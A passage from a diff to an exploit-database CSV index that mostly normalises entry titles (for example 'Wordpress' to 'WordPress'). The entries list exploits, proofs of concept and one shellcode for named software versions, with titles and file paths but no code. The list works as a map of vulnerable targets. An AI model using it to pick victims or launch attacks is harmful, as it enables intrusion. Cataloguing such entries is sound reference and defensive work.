Scripting",2010-11-29,"Underground Stockholm",php,webapps,0 @@ -31573,13 +31576,13 @@ id,file,description,date,author,platform,type,port 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server - Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote,0 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 -35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 +35055,platforms/windows/remote/35055.py,"Microsoft Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 -35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) Plugin - Arbitrary File Upload",2014-10-25,"Claudio Viviani",php,webapps,0 +35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) Plugin - Arbitrary File Upload",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 -40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0 -40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0 -40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0 +40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0 +40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0 +40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0 40102,platforms/multiple/dos/40102.txt,"Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption",2016-07-13,COSIG,multiple,dos,0 40103,platforms/multiple/dos/40103.txt,"Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption",2016-07-13,COSIG,multiple,dos,0 35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090 @@ -31589,14 +31592,14 @@ id,file,description,date,author,platform,type,port 35063,platforms/php/webapps/35063.txt,"Zimplit CMS - zimplit.php file Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35064,platforms/php/webapps/35064.txt,"Zimplit CMS - English_manual_version_2.php client Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 -35066,platforms/php/webapps/35066.txt,"Wordpress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 -35067,platforms/php/webapps/35067.txt,"Wordpress Safe Search Plugin 'v1' Parameter - Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 +35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 +35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter - Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 35068,platforms/hardware/remote/35068.txt,"pfSense - pkg_edit.php id Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35069,platforms/hardware/remote/35069.txt,"pfSense - pkg.php xml Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35070,platforms/hardware/remote/35070.txt,"pfSense - status_graph.php if Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35071,platforms/hardware/remote/35071.txt,"pfSense - interfaces.php if Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35072,platforms/php/webapps/35072.txt,"Drupal Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities",2010-12-08,"Justin Klein Keane",php,webapps,0 -35073,platforms/php/webapps/35073.txt,"Wordpress CP Multi View Event Calendar 1.01 Plugin - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80 +35073,platforms/php/webapps/35073.txt,"WordPress CP Multi View Event Calendar 1.01 Plugin - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Buffer Overflow",2014-10-27,metacom,windows,local,0 35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0 35076,platforms/multiple/webapps/35076.py,"HP Operations Agent - Remote Cross-Site Scripting iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 @@ -31608,7 +31611,7 @@ id,file,description,date,author,platform,type,port 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution",2014-10-27,Vulnerability-Lab,ios,webapps,1861 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps,0 -35084,platforms/php/webapps/35084.txt,"Wordpress Twitter Feed Plugin 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 +35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 @@ -31625,8 +31628,8 @@ id,file,description,date,author,platform,type,port 35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 -35101,platforms/windows/local/35101.rb,"Windows - TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,Metasploit,windows,local,0 -35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Pre-Authenticated Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 +35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,Metasploit,windows,local,0 +35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",multiple,webapps,0 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0 35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 @@ -31650,20 +31653,20 @@ id,file,description,date,author,platform,type,port 35122,platforms/php/webapps/35122.txt,"Social Share - 'postid' Parameter SQL Injection",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0 35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti - 'profil.php' SQL Injection",2010-12-20,"DeadLy DeMon",php,webapps,0 35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0 -35125,platforms/php/webapps/35125.txt,"Openfiler - 'device' Parameter Cross-Site Scripting",2010-12-21,db.pub.mail,php,webapps,0 +35125,platforms/php/webapps/35125.txt,"OpenFiler - 'device' Parameter Cross-Site Scripting",2010-12-21,db.pub.mail,php,webapps,0 35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Persistent Cross-Site Scripting",2014-10-31,"Ravi Rajput",hardware,webapps,0 35129,platforms/php/webapps/35129.txt,"Who's Who Script - Cross-Site Request Forgery Exploit (Add Admin Account)",2014-10-31,"ZoRLu Bugrahan",php,webapps,0 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 - Cross-Site Scripting / Directory Traversal",2010-12-21,waraxe,windows,remote,0 35131,platforms/php/webapps/35131.txt,"Social Share - 'username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",linux,remote,0 -35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for Wordpress - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 +35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! - SQL Injection",2010-12-22,R4dc0re,php,webapps,0 -35136,platforms/php/webapps/35136.txt,"Wordpress Accept Signups Plugin 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 +35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 35137,platforms/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,php,webapps,0 -35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 +35212,platforms/php/webapps/35212.txt,"XCloner WordPress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 35140,platforms/php/webapps/35140.txt,"MyBB 1.6 - search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35141,platforms/php/webapps/35141.txt,"MyBB 1.6 - private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35142,platforms/php/webapps/35142.txt,"Social Share - 'search' Parameter Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31671,11 +31674,11 @@ id,file,description,date,author,platform,type,port 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting",2010-12-23,"Gjoko Krstic",multiple,remote,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0 35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 -35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business - Directory Traversal",2010-12-24,anonymous,linux,remote,0 +35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for E-Business - Directory Traversal",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 -35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Pre-Authenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 +35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Pre-Authentication SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM",2014-11-03,Metasploit,hardware,remote,9100 -35153,platforms/osx/dos/35153.c,"Mac OSX Mavericks - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 +35153,platforms/osx/dos/35153.c,"Apple Mac OS X (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 - help.php Multiple Parameter Cross-Site Scripting",2010-12-28,waraxe,php,webapps,0 @@ -31699,7 +31702,7 @@ id,file,description,date,author,platform,type,port 35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0 35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 -35180,platforms/bsd/remote/35180.rb,"Citrix NetScaler SOAP Handler - Remote Code Execution",2014-11-06,Metasploit,bsd,remote,0 +35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution",2014-11-06,Metasploit,bsd,remote,0 35181,platforms/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",jsp,webapps,0 35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - vmx86.sys Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution",2014-11-06,Metasploit,php,remote,80 @@ -31719,9 +31722,9 @@ id,file,description,date,author,platform,type,port 35202,platforms/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial Of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent & Alphanumeric execve(_/bin/sh\0__NULL_NULL); Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 -35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 +35204,platforms/php/webapps/35204.txt,"Another WordPress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"XLabs Security",php,webapps,0 -35313,platforms/php/webapps/35313.txt,"Wordpress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 +35313,platforms/php/webapps/35313.txt,"WordPress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0 35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0 @@ -31729,15 +31732,15 @@ id,file,description,date,author,platform,type,port 35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0 -35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - (picture.php rate parameter) SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 +35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - (picture.php rate Parameter) SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0 -35218,platforms/php/webapps/35218.txt,"Wordpress SupportEzzy Ticket System Plugin 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 +35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 35220,platforms/multiple/webapps/35220.txt,"Joomla HD FLV Player < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal",2014-11-13,"Anastasios Monachos",jsp,webapps,0 35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 -35224,platforms/php/webapps/35224.txt,"MyBB 1.8.X - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80 +35224,platforms/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80 35225,platforms/windows/remote/35225.c,"Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,windows,remote,0 35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0 35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched - 'elimina' Parameter SQL Injection",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31755,58 +31758,58 @@ id,file,description,date,author,platform,type,port 35239,platforms/php/webapps/35239.txt,"PHPCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0 35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0 35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 - '.zip' Buffer Overflow",2011-01-19,"C4SS!0 G0M3S",windows,remote,0 -35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server - help/advanced/searchView.jsp searchWord Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 +35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server - help/advanced/searchView.jsp SearchWord Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE - Help Server help/advanced/workingSetManager.jsp workingSet Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial Of Service",2011-01-19,"Craig Freyman",windows,dos,0 35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0 35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0 35293,platforms/php/webapps/35293.txt,"VirtueMart eCommerce Component 1.1.6 for Joomla! - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps,0 -35288,platforms/php/webapps/35288.txt,"Wordpress oQey-Gallery Plugin 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 -35289,platforms/php/webapps/35289.txt,"Wordpress FCChat Widget Plugin 2.1.7 - 'path' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 - 'guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0 +35288,platforms/php/webapps/35288.txt,"WordPress oQey-Gallery Plugin 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35289,platforms/php/webapps/35289.txt,"WordPress FCChat Widget Plugin 2.1.7 - 'path' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 - 'Guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0 35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 - 'admin/index.php' SQL Injection",2011-01-20,"High-Tech Bridge SA",php,webapps,0 35252,platforms/multiple/remote/35252.php,"libxml2 2.6.x - 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure",2011-01-24,"Kees Cook",multiple,remote,0 35253,platforms/php/webapps/35253.txt,"web@all 1.1 - 'url' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 - 'module_image.php' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35255,platforms/php/webapps/35255.txt,"Wordpress Uploader Plugin 1.0 - 'num' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35255,platforms/php/webapps/35255.txt,"WordPress Uploader Plugin 1.0 - 'num' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35273,platforms/windows/remote/35273.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 - Arbitrary File Upload",2011-01-25,StenoPlasma,cfm,webapps,0 -35257,platforms/php/webapps/35257.txt,"Wordpress Videox7 UGC Plugin 2.5.3.2 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35258,platforms/php/webapps/35258.txt,"Wordpress Audio Plugin 0.5.1 - 'showfile' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 +35257,platforms/php/webapps/35257.txt,"WordPress Videox7 UGC Plugin 2.5.3.2 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35258,platforms/php/webapps/35258.txt,"WordPress Audio Plugin 0.5.1 - 'showfile' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 35259,platforms/php/webapps/35259.txt,"PivotX 2.2 - pivotx/includes/blogroll.php color Parameter Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 35260,platforms/php/webapps/35260.txt,"PivotX 2.2 - pivotx/includes/timwrapper.php src Parameter Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 -35261,platforms/php/webapps/35261.txt,"RSS Feed Reader Wordpress Plugin 0.1 - 'rss_url' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 -35262,platforms/php/webapps/35262.txt,"Wordpress WP Featured Post with Thumbnail Plugin 3.0 - 'src' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 -35263,platforms/php/webapps/35263.txt,"Wordpress WP Publication Archive Plugin 2.0.1 - 'file' Parameter Information Disclosure",2011-01-23,"AutoSec Tools",php,webapps,0 -35264,platforms/php/webapps/35264.txt,"Wordpress Featured Content Plugin 0.0.1 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35265,platforms/php/webapps/35265.php,"Wordpress Recip.ly 1.1.7 Plugin - 'uploadImage.php' Arbitrary File Upload",2011-01-25,"AutoSec Tools",php,webapps,0 +35261,platforms/php/webapps/35261.txt,"RSS Feed Reader WordPress Plugin 0.1 - 'rss_url' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 +35262,platforms/php/webapps/35262.txt,"WordPress WP Featured Post with Thumbnail Plugin 3.0 - 'src' Parameter Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 +35263,platforms/php/webapps/35263.txt,"WordPress WP Publication Archive Plugin 2.0.1 - 'file' Parameter Information Disclosure",2011-01-23,"AutoSec Tools",php,webapps,0 +35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 - 'listid' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 Plugin - 'uploadImage.php' Arbitrary File Upload",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Persistent Cross-Site Scripting",2014-11-17,"Avinash Thapa",php,webapps,0 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass (1)",2014-11-17,"Project Zero Labs",hardware,webapps,0 35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0 -35285,platforms/php/webapps/35285.txt,"Wordpress Feature Slideshow Plugin 1.0.6 - 'src' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 -35286,platforms/php/webapps/35286.txt,"Wordpress BezahlCode Generator Plugin 1.0 - 'gen_name' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 +35285,platforms/php/webapps/35285.txt,"WordPress Feature Slideshow Plugin 1.0.6 - 'src' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35286,platforms/php/webapps/35286.txt,"WordPress BezahlCode Generator Plugin 1.0 - 'gen_name' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Persistent Cross-Site Scripting",2014-11-17,spyk2r,php,webapps,80 35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",xml,webapps,80 35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80 35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple 